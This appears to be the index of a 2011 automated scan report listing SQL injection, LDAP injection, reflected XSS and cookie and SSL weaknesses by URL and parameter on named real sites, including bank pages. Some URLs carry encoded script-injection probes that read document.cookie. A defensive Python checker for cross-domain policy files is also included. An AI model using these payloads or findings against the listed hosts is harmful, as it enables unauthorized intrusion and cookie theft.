Reflected XSS, SQL Injection, HTTP Header Injection, CWE-79, CWE-89, CWE-113, DORK Search, Vulnerable Websites

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Apr 26 09:34:48 CDT 2011.

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [client parameter]

1.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [name of an arbitrarily supplied request parameter]

1.3. http://afreshbunch.com/ [ASPSESSIONIDSSTDDTRS cookie]

1.4. http://afreshbunch.com/files/com/call.asp [site_id parameter]

1.5. http://afreshbunch.com/user/453756/theme/design/AFB2011/style.css [REST URL parameter 3]

1.6. https://store.tenable.com/ [cPath parameter]

1.7. https://store.tenable.com/ [main_page parameter]

1.8. https://store.tenable.com/ [name of an arbitrarily supplied request parameter]

1.9. https://store.tenable.com/includes/templates/tenable/css/t.css [REST URL parameter 1]

1.10. https://store.tenable.com/includes/templates/tenable/css/t.css [name of an arbitrarily supplied request parameter]

1.11. https://store.tenable.com/includes/templates/tenable/css/t.css [v parameter]

1.12. https://store.tenable.com/includes/templates/tenable/img/favicon.ico [REST URL parameter 1]

1.13. https://store.tenable.com/includes/templates/tenable/jscript/t.js [REST URL parameter 1]

1.14. https://store.tenable.com/includes/templates/tenable/jscript/t.js [name of an arbitrarily supplied request parameter]

1.15. https://store.tenable.com/includes/templates/tenable/jscript/t.js [v parameter]

1.16. https://store.tenable.com/index.php [REST URL parameter 1]

1.17. https://store.tenable.com/index.php [action parameter]

1.18. https://store.tenable.com/index.php [cPath parameter]

1.19. https://store.tenable.com/index.php [cart_quantity parameter]

1.20. https://store.tenable.com/index.php [main_page parameter]

1.21. https://store.tenable.com/index.php [name of an arbitrarily supplied request parameter]

1.22. https://store.tenable.com/index.php [products_id parameter]

1.23. https://store.tenable.com/index.php [zenid parameter]

1.24. http://www.afreshbunch.com/ [email parameter]

1.25. https://www.bankofamerica.com/Control.do [BOA_0020 cookie]

1.26. https://www.bankofamerica.com/Control.do [BOA_COM_BT_ELIGIBLE cookie]

1.27. https://www.bankofamerica.com/Control.do [CONTEXT cookie]

1.28. https://www.bankofamerica.com/Control.do [INTL_LANG cookie]

1.29. https://www.bankofamerica.com/Control.do [TLTSID cookie]

1.30. https://www.bankofamerica.com/Control.do [name of an arbitrarily supplied request parameter]

1.31. https://www.bankofamerica.com/ProcessUser.do [TLTSID cookie]

1.32. http://www.clone-systems.com/ecommerce/cart.php [CMSSESSIDe4d04fcf cookie]

1.33. http://www.clone-systems.com/ecommerce/cart.php [name of an arbitrarily supplied request parameter]

2. LDAP injection

2.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [client parameter]

2.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [num parameter]

2.3. https://militarybankonline.bankofamerica.com/efs/servlet/military/login-wait.jsp [TCID cookie]

2.4. https://militarybankonline.bankofamerica.com/efs/servlet/military/login-wait.jsp [ngen_throttle cookie]

2.5. http://sofa.bankofamerica.com/cm [cck parameter]

2.6. http://sofa.bankofamerica.com/cm [ci parameter]

2.7. http://sofa.bankofamerica.com/eluminate [ci parameter]

2.8. https://www.bankofamerica.com/Control.do [BIGipServerngen-www.80 cookie]

2.9. https://www.bankofamerica.com/Control.do [BIGipServerngen-www.80 cookie]

3. HTTP header injection

4. Cross-site scripting (reflected)

4.1. https://account.snap.com/signup.php [email parameter]

4.2. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

4.3. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

4.4. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

4.5. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

4.6. https://account.snap.com/signup.php [url parameter]

4.7. http://ads.adxpose.com/ads/ads.js [uid parameter]

4.8. http://adserving.cpxinteractive.com/st [ad_size parameter]

4.9. http://adserving.cpxinteractive.com/st [section parameter]

4.10. http://afreshbunch.com/files/com/call.asp [instance_id parameter]

4.11. http://afreshbunch.com/files/com/call.asp [lastpage parameter]

4.12. http://afreshbunch.com/forums/ [name of an arbitrarily supplied request parameter]

4.13. http://afreshbunch.com/forums/ [page parameter]

4.14. http://ar.voicefive.com/b/rc.pli [func parameter]

4.15. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

4.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ncu parameter]

4.17. http://ds.addthis.com/red/psi/sites/www.comodo.com/p.json [callback parameter]

4.18. http://event.adxpose.com/event.flow [uid parameter]

4.19. http://ib.adnxs.com/ab [cnd parameter]

4.20. http://ib.adnxs.com/ptj [redir parameter]

4.21. http://login.sisna.com/login_multiple/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000344)%3C/script%3E parameter]

4.22. http://login.sisna.com/login_multiple/ [RelayState parameter]

4.23. http://login.sisna.com/login_multiple/ [SAMLRequest parameter]

4.24. http://login.sisna.com/login_multiple/ [name of an arbitrarily supplied request parameter]

4.25. http://shots.snap.com/rk.php [vid parameter]

4.26. http://shots.snap.com/shot/ [size parameter]

4.27. http://shots.snap.com/shot/ [svc parameter]

4.28. http://shots.snap.com/shot/ [url parameter]

4.29. http://shots.snap.com/shot/ [url parameter]

4.30. http://shots.snap.com/snap_shots.js [key parameter]

4.31. http://shots.snap.com/snap_shots.js [preview_trigger parameter]

4.32. http://spamlaws.us.intellitxt.com/al.asp [jscallback parameter]

4.33. http://spamlaws.us.intellitxt.com/iframescript.jsp [src parameter]

4.34. http://spamlaws.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.35. http://spamlaws.us.intellitxt.com/v4/init [jscallback parameter]

4.36. http://spamlaws.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.37. http://widgets.digg.com/buttons/count [url parameter]

4.38. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 1]

4.39. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 1]

4.40. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 2]

4.41. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 3]

4.42. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 4]

4.43. http://www.afreshbunch.com/ [email parameter]

4.44. http://www.afreshbunch.com/files/com/call.asp [instance_id parameter]

4.45. http://www.afreshbunch.com/files/com/call.asp [lastpage parameter]

4.46. http://www.directbrand.com/tracking202/static/landing.php [lpip parameter]

4.47. http://www.directbrand.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]

4.48. http://www.genbook.com/bookings/booknowjstag.action [bookingSourceId parameter]

4.49. http://www.merrilledge.com/M/WebResource.axd [d parameter]

4.50. http://www.merrilledge.com/m/pages/global-oao.aspx [name of an arbitrarily supplied request parameter]

4.51. https://www.merrilledge.com/M/WebResource.axd [d parameter]

4.52. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]

4.53. http://www.secureconnect.com/rssReplayProxy.php [name of an arbitrarily supplied request parameter]

4.54. http://www.secureconnect.com/rssReplayProxy.php [source parameter]

4.55. http://adserving.cpxinteractive.com/st [Referer HTTP header]

4.56. http://player.vimeo.com/config/14606948 [Referer HTTP header]

4.57. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.58. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.59. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

4.60. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

4.61. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

4.62. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

4.63. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.64. http://www.bankofamerica.com/weblinking/flyout/HM_Arrays.js [state cookie]

4.65. https://www.bankofamerica.com/privacy [state cookie]

4.66. https://www.bankofamerica.com/privacy/Control.do [state cookie]

4.67. https://www.bankofamerica.com/privacy/index.jsp [state cookie]

4.68. https://www.bankofamerica.com/smallbusiness/index.jsp [BOA_0020 cookie]

4.69. https://www.bankofamerica.com/smallbusiness/index.jsp [state cookie]

4.70. https://www.merrilledge.com/m/pages/global-oao.aspx [name of an arbitrarily supplied request parameter]

5. Flash cross-domain policy

5.1. http://109.xg4ken.com/crossdomain.xml

5.2. http://ad.doubleclick.net/crossdomain.xml

5.3. http://afreshbunch.com/crossdomain.xml

5.4. http://bridgefront.com/crossdomain.xml

5.5. http://data.cmcore.com/crossdomain.xml

5.6. http://data.coremetrics.com/crossdomain.xml

5.7. http://firstdata.122.2o7.net/crossdomain.xml

5.8. http://fls.doubleclick.net/crossdomain.xml

5.9. http://now.eloqua.com/crossdomain.xml

5.10. http://pixel.quantserve.com/crossdomain.xml

5.11. http://servedby.flashtalking.com/crossdomain.xml

5.12. https://shots-s.snap.com/crossdomain.xml

5.13. http://shots.snap.com/crossdomain.xml

5.14. http://sofa.bankofamerica.com/crossdomain.xml

5.15. http://tc.bankofamerica.com/crossdomain.xml

5.16. https://tc.bankofamerica.com/crossdomain.xml

5.17. http://www.afreshbunch.com/crossdomain.xml

5.18. http://realestatecenter.bankofamerica.com/crossdomain.xml

5.19. https://secure.opinionlab.com/crossdomain.xml

5.20. http://stats.wordpress.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://firstdata.122.2o7.net/clientaccesspolicy.xml

6.3. http://stats.wordpress.com/clientaccesspolicy.xml
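
Sections 5 and 6 list only the URLs of the policy files the scanner fetched; whether each one is actually dangerous depends on its contents, which the index does not show. The following is an added example, not part of the XSS.CX report, of the check a reviewer would run against each of those files: it parses a Flash crossdomain.xml or a Silverlight clientaccesspolicy.xml and flags a wildcard origin, a secure="false" grant and a wildcard header grant. The three policy documents are constructed samples; none is the real file from any host listed above.

```python
"""Audit a Flash crossdomain.xml or Silverlight clientaccesspolicy.xml for
over-permissive cross-domain access. The sample policies below are
constructed here; none is a real file from the hosts in the report."""
import xml.etree.ElementTree as ET

# Constructed sample: the shape the "Flash cross-domain policy" check flags.
# Any site can serve a SWF that reads this host's responses with the
# victim's cookies attached.
PERMISSIVE_CROSSDOMAIN = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Constructed sample: the same file tightened to one named origin.
STRICT_CROSSDOMAIN = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.example.com" secure="true"/>
</cross-domain-policy>"""

# Constructed sample Silverlight policy granting every origin access.
PERMISSIVE_CLIENTACCESS = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""


def audit_policy(xml_text: str) -> list:
    """Return human-readable findings for one policy file (empty = clean)."""
    findings = []
    root = ET.fromstring(xml_text)

    if root.tag == "cross-domain-policy":  # Flash
        for el in root.iter("allow-access-from"):
            domain = el.get("domain", "")
            if domain == "*":
                findings.append('allow-access-from domain="*": every origin may read responses')
            # secure="false" lets an SWF loaded over plain HTTP read this
            # HTTPS host's data.
            if el.get("secure", "true").lower() == "false":
                findings.append(f'allow-access-from {domain!r} sets secure="false"')
        for el in root.iter("allow-http-request-headers-from"):
            if el.get("domain") == "*" and el.get("headers") == "*":
                findings.append('allow-http-request-headers-from domain="*" headers="*": '
                                'any origin may send arbitrary request headers')
    elif root.tag == "access-policy":  # Silverlight
        for el in root.iter("domain"):
            if el.get("uri") == "*":
                findings.append('clientaccesspolicy.xml <domain uri="*"/>: '
                                'every origin may access the granted paths')
    else:
        findings.append(f"unrecognised policy root <{root.tag}>")
    return findings


if __name__ == "__main__":
    for label, doc in [("permissive crossdomain.xml", PERMISSIVE_CROSSDOMAIN),
                       ("strict crossdomain.xml", STRICT_CROSSDOMAIN),
                       ("permissive clientaccesspolicy.xml", PERMISSIVE_CLIENTACCESS)]:
        print(f"{label}: {audit_policy(doc) or ['no findings']}")
```

A wildcard on a pure static or ad-serving host is often intentional and carries little risk; the finding matters when the host also issues session cookies or serves authenticated content, because the policy then lets any site read that content on the victim's behalf. Triage the list above by host role before reporting.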

7. Cleartext submission of password

7.1. http://afreshbunch.com/

7.2. http://afreshbunch.com/forums/

7.3. http://learn.bridgefront.com/

7.4. http://learn.bridgefront.com/login.jsp

7.5. http://login.sisna.com/login_multiple/

7.6. http://www.afreshbunch.com/

8. SQL statement in request parameter

8.1. https://account.snap.com/signup.php

8.2. http://learn.bridgefront.com/KeyRegister

8.3. https://www.fs.ustrust.com/login/login.aspx

9. SSL cookie without secure flag set

9.1. https://account.snap.com/signup.php

9.2. https://landingpage.leads.dynamicssite.com/PostLead.aspx

9.3. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp

9.4. https://secure.opinionlab.com/

9.5. https://secure.opinionlab.com/ccc01/comment_card_d.asp

9.6. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

9.7. https://support.sentrigo.com/

9.8. https://www.bankofamerica.com/

9.9. https://www.bankofamerica.com/homepage/WidgetAction.go

9.10. https://www.bankofamerica.com/homepage/overview.go

9.11. https://www.bankofamerica.com/homepage/stateSelect.go

9.12. https://www.mysecureconnect.com/login.aspx

9.13. https://lct.salesforce.com/sfga.js

9.14. https://olui2.fs.ml.com/login/login.aspx

9.15. https://securitymetrics.com/sm/PANscan/

9.16. https://securitymetrics.com/sm/determinesaq/

9.17. https://securitymetrics.com/sm/determinesaq/reset

9.18. https://securitymetrics.com/sm/determinesaq/storechd

9.19. https://securitymetrics.com/sm/determinesaq/terminaltype

9.20. https://shots-s.snap.com/snap_shots.js

9.21. https://store.tenable.com/index.php

9.22. https://support.tenable.com/support-center/

9.23. https://tc.bankofamerica.com/c

9.24. https://www.bankofamerica.com/Control.do

9.25. https://www.bankofamerica.com/ProcessUser.do

9.26. https://www.bankofamerica.com/deposits/cds-iras.go

9.27. https://www.bankofamerica.com/deposits/checking-accounts.go

9.28. https://www.bankofamerica.com/deposits/savings-accounts.go

9.29. https://www.bankofamerica.com/deposits/special-programs/add-it-up.go

9.30. https://www.bankofamerica.com/deposits/special-programs/keep-the-change.go

9.31. https://www.bankofamerica.com/military

9.32. https://www.bankofamerica.com/privacy

9.33. https://www.bankofamerica.com/privacy/Control.do

9.34. https://www.bankofamerica.com/privacy/index.jsp

9.35. https://www.bankofamerica.com/search/Search.do

9.36. https://www.bankofamerica.com/smallbusiness/index.jsp

9.37. https://www.bankofamerica.com/www/en_US/global/hs_home/stylesheets/home_win_ns6.css

9.38. https://www.bankofamerica.com/www/en_US/global/js/masthead.js

9.39. https://www.bankofamerica.com/www/en_US/js/search/jquery-1.2.6.js

9.40. https://www.bankofamerica.com/www/en_US/js/search/search-lite.js

9.41. https://www.bankofamerica.com/www/global/js/tc_logging.js

9.42. https://www.fs.ustrust.com/login/login.aspx

9.43. https://www.merrilledge.com/m/pages/home.aspx

10. Session token in URL

10.1. http://l.sharethis.com/pview

10.2. https://www.bankofamerica.com/credit-cards/cardoverview.action

10.3. http://www.facebook.com/extern/login_status.php

10.4. http://www.hugthecloud.com/

11. SSL certificate

11.1. https://landingpage.leads.dynamicssite.com/

11.2. https://m8security.foxycart.com/

11.3. https://secure.opinionlab.com/

11.4. https://securitymetrics.com/

11.5. https://store.tenable.com/

11.6. https://support.tenable.com/

11.7. https://www.clone-systems.com/

11.8. https://www.comodo.com/

11.9. https://www.hackerguardian.com/

11.10. https://account.snap.com/

11.11. https://lct.salesforce.com/

11.12. https://militarybankonline.bankofamerica.com/

11.13. https://olui2.fs.ml.com/

11.14. https://secure.comodo.com/

11.15. https://secure.comodo.net/

11.16. https://secure.eloqua.com/

11.17. https://shots-s.snap.com/

11.18. https://support.sentrigo.com/

11.19. https://tc.bankofamerica.com/

11.20. https://www.bankofamerica.com/

11.21. https://www.fs.ustrust.com/

11.22. https://www.mavitunasecurity.com/

11.23. https://www.merrilledge.com/

11.24. https://www.mysecureconnect.com/

11.25. https://www.saintcorporation.com/

12. ASP.NET ViewState without MAC enabled

12.1. http://www.merrilledge.com/m/pages/global-oao.aspx

12.2. https://www.merrilledge.com/m/pages/global-oao.aspx

12.3. https://www.merrilledge.com/m/pages/home.aspx

13. Open redirection

14. Cookie scoped to parent domain

14.1. http://assets.trialpay.com/tr/

14.2. http://shots.snap.com/rk.php

14.3. http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/

14.4. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/

14.5. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/

14.6. http://www.clone-systems.com/ecommerce/index.php

14.7. http://www.hugthecloud.com/

14.8. http://www.hugthecloud.com/favicon.ico

14.9. http://www.m8security.com/

14.10. http://109.xg4ken.com/media/redir.php

14.11. http://ad.amgdgt.com/ads/

14.12. http://ar.voicefive.com/b/wc_beacon.pli

14.13. http://ar.voicefive.com/bmx3/broker.pli

14.14. http://b.scorecardresearch.com/b

14.15. http://b.scorecardresearch.com/p

14.16. http://b.voicefive.com/b

14.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.18. http://c.bing.com/c.gif

14.19. http://cf.addthis.com/red/p.json

14.20. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

14.21. http://cspix.media6degrees.com/orbserv/hbpix

14.22. http://downloads.yahoo.com/

14.23. http://downloads.yahoo.com/freeware

14.24. http://downloads.yahoo.com/linux

14.25. http://downloads.yahoo.com/mobile

14.26. http://downloads.yahoo.com/windows

14.27. http://downloads.yahoo.com/windows/desktop-enhancements/virtual-desktop

14.28. http://downloads.yahoo.com/windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305

14.29. http://ds.addthis.com/red/psi/sites/www.comodo.com/p.json

14.30. http://ib.adnxs.com/ab

14.31. http://ib.adnxs.com/ptj

14.32. http://ib.adnxs.com/pxj

14.33. http://ib.adnxs.com/seg

14.34. http://maps.google.com/maps

14.35. http://maps.google.com/maps/vp

14.36. http://mydownload.paretologic.safecart.com/pcha/homepage

14.37. https://olui2.fs.ml.com/login/login.aspx

14.38. http://pixel.33across.com/ps/

14.39. http://pixel.intellitxt.com/pixel.jsp

14.40. http://pixel.quantserve.com/pixel

14.41. http://segment-pixel.invitemedia.com/pixel

14.42. http://servedby.flashtalking.com/click/16008

14.43. https://shots-s.snap.com/snap_shots.js

14.44. http://shots.snap.com/images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/

14.45. http://shots.snap.com/preview/

14.46. http://shots.snap.com/shot/

14.47. http://shots.snap.com/snap_shots.js

14.48. http://spamlaws.us.intellitxt.com/al.asp

14.49. http://spamlaws.us.intellitxt.com/intellitxt/front.asp

14.50. http://tc.bankofamerica.com/i

14.51. https://tc.bankofamerica.com/c

14.52. http://threats2.paretologic.safecart.com/pcha/download

14.53. http://translate.google.com/translate_a/element.js

14.54. http://www.afreshbunch.com/

14.55. https://www.bankofamerica.com/

14.56. https://www.bankofamerica.com/credit-cards/cardoverview.action

14.57. https://www.bankofamerica.com/homepage/overview.go

14.58. https://www.bankofamerica.com/homepage/stateSelect.go

14.59. https://www.bankofamerica.com/military

14.60. https://www.bankofamerica.com/military/index.cfm

14.61. https://www.bankofamerica.com/privacy

14.62. https://www.bankofamerica.com/www/en_US/global/hs_home/stylesheets/home_win_ns6.css

14.63. https://www.bankofamerica.com/www/en_US/global/js/masthead.js

14.64. https://www.bankofamerica.com/www/en_US/js/search/jquery-1.2.6.js

14.65. https://www.bankofamerica.com/www/en_US/js/search/search-lite.js

14.66. https://www.bankofamerica.com/www/global/js/tc_logging.js

14.67. http://www.bing.com/

14.68. http://www.bing.com/HPImageArchive.aspx

14.69. http://www.bing.com/fd/ls/l

14.70. http://www.bing.com/scopePopupHandler.aspx

14.71. http://www.bizographics.com/collect/

14.72. http://www.bridgefront.com/cart/

14.73. https://www.fs.ustrust.com/login/login.aspx

14.74. http://www.is3.com/about/contactUs.do

14.75. https://www.merrilledge.com/m/pages/home.aspx

14.76. http://www.paretologic.com/download/pchealthadvisor/revenuewire/

15. Cookie without HttpOnly flag set

15.1. https://account.snap.com/signup.php

15.2. http://ads.adxpose.com/ads/ads.js

15.3. http://afreshbunch.com/about.htm

15.4. http://assets.trialpay.com/tr/

15.5. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

15.6. http://event.adxpose.com/event.flow

15.7. http://ikano.com/

15.8. http://learn.bankofamerica.com/

15.9. http://learn.bridgefront.com/

15.10. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp

15.11. https://secure.opinionlab.com/

15.12. https://secure.opinionlab.com/ccc01/comment_card_d.asp

15.13. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

15.14. http://shots.snap.com/rk.php

15.15. http://sofa.bankofamerica.com/eluminate

15.16. https://support.sentrigo.com/

15.17. http://t2.trackalyzer.com/trackalyze.asp

15.18. http://t2.trackalyzer.com/trackalyze.asp

15.19. http://www.afreshbunch.com/

15.20. http://www.backbonesecurity.com/interior.cfm

15.21. http://www.bankofamerica.com/weblinking/

15.22. https://www.bankofamerica.com/

15.23. https://www.bankofamerica.com/Control.do

15.24. https://www.bankofamerica.com/ProcessUser.do

15.25. https://www.bankofamerica.com/credit-cards/cardoverview.action

15.26. https://www.bankofamerica.com/deposits/cds-iras.go

15.27. https://www.bankofamerica.com/deposits/checking-accounts.go

15.28. https://www.bankofamerica.com/deposits/index.action

15.29. https://www.bankofamerica.com/deposits/savings-accounts.go

15.30. https://www.bankofamerica.com/deposits/special-programs/add-it-up.go

15.31. https://www.bankofamerica.com/deposits/special-programs/keep-the-change.go

15.32. https://www.bankofamerica.com/homepage/WidgetAction.go

15.33. https://www.bankofamerica.com/homepage/overview.go

15.34. https://www.bankofamerica.com/homepage/stateSelect.go

15.35. https://www.bankofamerica.com/hub/index.action

15.36. https://www.bankofamerica.com/planning/investments.action

15.37. https://www.bankofamerica.com/privacy/Control.do

15.38. https://www.bankofamerica.com/privacy/index.jsp

15.39. https://www.bankofamerica.com/search/Search.do

15.40. https://www.bankofamerica.com/sitemap/index.action

15.41. https://www.bankofamerica.com/smallbusiness/index.jsp

15.42. http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/

15.43. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/

15.44. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/

15.45. http://www.clone-systems.com/ecommerce/index.php

15.46. http://www.clone-systems.com/pci-scanning.html

15.47. http://www.clone-systems.com/stylesheet.php

15.48. http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php

15.49. http://www.firstdata.com/en_us/home

15.50. http://www.genbook.com/bookings/booknowjstag.action

15.51. http://www.genbook.com/bookings/serviceprovider/30010843/logo

15.52. http://www.genbook.com/bookings/serviceprovider/30010944/logo

15.53. http://www.hugthecloud.com/

15.54. http://www.hugthecloud.com/favicon.ico

15.55. http://www.m8security.com/

15.56. http://www.net-address.co.uk/

15.57. http://109.xg4ken.com/media/redir.php

15.58. http://ad.amgdgt.com/ads/

15.59. http://ad.yieldmanager.com/pixel

15.60. http://ar.voicefive.com/b/wc_beacon.pli

15.61. http://ar.voicefive.com/bmx3/broker.pli

15.62. http://b.scorecardresearch.com/b

15.63. http://b.scorecardresearch.com/p

15.64. http://b.voicefive.com/b

15.65. http://bing.com/

15.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs

15.67. http://c.bing.com/c.gif

15.68. http://cf.addthis.com/red/p.json

15.69. http://cspix.media6degrees.com/orbserv/hbpix

15.70. http://ds.addthis.com/red/psi/sites/www.comodo.com/p.json

15.71. http://firstdata.122.2o7.net/b/ss/firstdataprod/1/H.20.3/s97121651181951

15.72. http://freemarker.com/

15.73. https://lct.salesforce.com/sfga.js

15.74. http://maps.google.com/maps

15.75. http://maps.google.com/maps/vp

15.76. http://mydownload.paretologic.safecart.com/pcha/homepage

15.77. http://nuclearpesticide.com/

15.78. https://olui2.fs.ml.com/login/login.aspx

15.79. http://partners.genbook.com/MAPProc.aspx

15.80. http://pixel.33across.com/ps/

15.81. http://pixel.intellitxt.com/pixel.jsp

15.82. http://pixel.quantserve.com/pixel

15.83. https://securitymetrics.com/sm/PANscan/

15.84. https://securitymetrics.com/sm/determinesaq/

15.85. https://securitymetrics.com/sm/determinesaq/reset

15.86. https://securitymetrics.com/sm/determinesaq/storechd

15.87. https://securitymetrics.com/sm/determinesaq/terminaltype

15.88. http://segment-pixel.invitemedia.com/pixel

15.89. http://servedby.flashtalking.com/click/16008

15.90. https://shots-s.snap.com/snap_shots.js

15.91. http://shots.snap.com/images/v6.59/snip/arrow-contd/89fdd0457a773fb9e78a2ee3e0b8ebd3/d/pf/p3247/arrow/

15.92. http://shots.snap.com/preview/

15.93. http://shots.snap.com/shot/

15.94. http://shots.snap.com/snap_shots.js

15.95. http://sofa.bankofamerica.com/cm

15.96. http://sofa.bankofamerica.com/eluminate

15.97. http://spamlaws.us.intellitxt.com/al.asp

15.98. http://spamlaws.us.intellitxt.com/intellitxt/front.asp

15.99. https://store.tenable.com/index.php

15.100. https://support.tenable.com/support-center/

15.101. http://tc.bankofamerica.com/i

15.102. https://tc.bankofamerica.com/c

15.103. http://threats2.paretologic.safecart.com/pcha/download

15.104. http://tracking.hearthstoneonline.com/www/delivery/ajs.php

15.105. http://tracking.hearthstoneonline.com/www/delivery/lg.php

15.106. http://translate.google.com/translate_a/element.js

15.107. http://twitter.com/javascripts/blogger.js

15.108. http://twitter.com/statuses/user_timeline/hugthecloud.json

15.109. http://www.afreshbunch.com/

15.110. http://www.afreshbunch.com/files/com/call.asp

15.111. http://www.bankofamerica.com/adtrack/index.cgi

15.112. http://www.bankofamerica.com/community/flyout/HM_Arrays.js

15.113. http://www.bankofamerica.com/community/stylesheets/community_ov_styles.css

15.114. http://www.bankofamerica.com/foundation/flyout/HM_Arrays.js

15.115. http://www.bankofamerica.com/global/hs_home/common.css

15.116. http://www.bankofamerica.com/global/hs_home/stylesheets/home_win_ie6.css

15.117. http://www.bankofamerica.com/global/images/new_Banklogo.gif

15.118. http://www.bankofamerica.com/global/js/bridge-js-utils.js

15.119. http://www.bankofamerica.com/global/js/masthead.js

15.120. http://www.bankofamerica.com/global/js/mvc-js-utils.js

15.121. http://www.bankofamerica.com/global/mvc_objects/flyout/BofA_keyboard_navigation.js

15.122. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_BankAmerica.js

15.123. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_Loader.js

15.124. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_ScriptDOM.js

15.125. http://www.bankofamerica.com/global/mvc_objects/images/1pixel_clear.gif

15.126. http://www.bankofamerica.com/global/mvc_objects/images/mhd_5x1_lines2.gif

15.127. http://www.bankofamerica.com/global/mvc_objects/images/mhd_reg_5x1_lines.gif

15.128. http://www.bankofamerica.com/global/mvc_objects/images/pop_bac_logo.gif

15.129. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style.css

15.130. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_header_footer_style.css

15.131. http://www.bankofamerica.com/global/mvc_objects/stylesheet/masthead.css

15.132. http://www.bankofamerica.com/global/stylesheets/01_win_ie.css

15.133. http://www.bankofamerica.com/images/px.gif

15.134. http://www.bankofamerica.com/images/shared/dot_clear.gif

15.135. http://www.bankofamerica.com/small_business/business_financing/stylesheets/masthead.css

15.136. http://www.bankofamerica.com/small_business/online_banking_and_services/stylesheets/masthead.css

15.137. http://www.bankofamerica.com/weblinking/main.css

15.138. http://www.bankofamerica.com/weblinking/main_ie.css

15.139. http://www.bankofamerica.com/www/global/js/tc_throttle.js

15.140. http://www.bankofamerica.com/x.gif

15.141. https://www.bankofamerica.com/military

15.142. https://www.bankofamerica.com/military/index.cfm

15.143. https://www.bankofamerica.com/privacy

15.144. https://www.bankofamerica.com/www/en_US/global/hs_home/stylesheets/home_win_ns6.css

15.145. https://www.bankofamerica.com/www/en_US/global/js/masthead.js

15.146. https://www.bankofamerica.com/www/en_US/js/search/jquery-1.2.6.js

15.147. https://www.bankofamerica.com/www/en_US/js/search/search-lite.js

15.148. https://www.bankofamerica.com/www/global/js/tc_logging.js

15.149. http://www.bing.com/

15.150. http://www.bing.com/HPImageArchive.aspx

15.151. http://www.bing.com/fd/ls/l

15.152. http://www.bing.com/scopePopupHandler.aspx

15.153. http://www.bizographics.com/collect/

15.154. http://www.bridgefront.com/cart/

15.155. http://www.directbrand.com/tracking202/redirect/pci.php

15.156. http://www.directbrand.com/tracking202/static/record.php

15.157. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11

15.158. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11

15.159. https://www.fs.ustrust.com/login/login.aspx

